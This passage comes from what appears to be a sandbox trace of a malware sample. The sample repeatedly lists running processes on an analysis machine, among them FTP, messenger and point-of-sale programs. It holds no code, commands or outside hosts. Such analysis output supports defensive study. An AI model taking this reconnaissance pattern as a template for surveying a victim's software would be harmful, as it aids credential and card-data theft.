th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0295.789] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0295.791] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0295.889] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0295.891] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0295.894] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0295.896] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0295.898] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0295.900] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0295.902] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0295.904] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0295.906] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0295.908] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0295.910] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0295.912] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0295.914] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0295.916] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0295.919] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0295.921] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0295.923] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0295.925] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0295.926] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0295.928] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0295.930] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0295.932] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0296.060] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0296.062] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0296.064] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.065] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0296.067] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0296.069] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0296.071] CloseHandle (hObject=0x227c) returned 1 [0296.071] Sleep (dwMilliseconds=0x64) [0296.233] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0296.245] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.250] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0296.252] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0296.254] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.256] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0296.259] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.261] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0296.264] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0296.266] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0296.268] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.271] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.273] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0296.275] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.328] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.331] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.333] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.335] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.337] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.341] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.343] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0296.345] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0296.347] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0296.349] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.351] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0296.353] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0296.357] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0296.359] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0296.361] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0296.363] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.365] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0296.367] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0296.497] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.500] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0296.502] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0296.504] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0296.507] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0296.509] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0296.512] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0296.514] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0296.516] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0296.518] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0296.521] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0296.523] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0296.525] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0296.528] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0296.530] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0296.532] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0296.534] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0296.536] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0296.538] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0296.540] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0296.601] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0296.602] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0296.604] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 